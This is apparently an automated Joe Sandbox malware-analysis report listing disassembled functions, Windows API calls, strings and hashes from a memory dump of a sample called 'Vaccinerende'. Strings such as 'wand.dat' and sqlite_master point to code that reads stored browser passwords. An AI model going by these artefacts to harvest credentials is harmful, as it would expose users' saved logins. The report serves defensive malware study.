• Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• sqlite_altertab_%s, xrefs: 0042EC4C
• virtual tables may not be altered, xrefs: 0042EBD2
• Cannot add a column to a view, xrefs: 0042EBE8
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040560C
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                              • String ID: *.*$dat$wand.dat
                                                                              • API String ID: 2618321458-1828844352
                                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                              APIs
                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                              • String ID:
                                                                              • API String ID: 1549203181-0
                                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00412057
                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                              • String ID:
                                                                              • API String ID: 3550944819-0
                                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                              APIs
                                                                              • free.MSVCRT ref: 0040F561
                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$free
                                                                              • String ID: g4@
                                                                              • API String ID: 2888793982-2133833424
                                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: @
                                                                              • API String ID: 3510742995-2766056989
                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                              APIs
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                              • memset.MSVCRT ref: 0040AF18
                                                                              • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@memcpymemset
                                                                              • String ID:
                                                                              • API String ID: 1865533344-0
                                                                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004144E7
                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                              • memset.MSVCRT ref: 0041451A
                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                              • String ID:
                                                                              • API String ID: 1127616056-0
                                                                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                              • memset.MSVCRT ref: 0042FED3
                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: sqlite_master
                                                                              • API String ID: 438689982-3163232059
                                                                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                              APIs
                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3917621476-0
                                                                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                              APIs
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                              • String ID:
                                                                              • API String ID: 822687973-0
                                                                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                              • malloc.MSVCRT ref: 00417459
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                              • free.MSVCRT ref: 0041747F
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                              • String ID:
                                                                              • API String ID: 2605342592-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
• RegisterClassW.USER32(00000001), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
APIs
• GetDlgItem.USER32(?,?), ref: 00409B40
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• strlen.MSVCRT ref: 00403006
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
Strings
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                              • String ID: URL
                                                                              • API String ID: 2108176848-3574463123
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
APIs
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
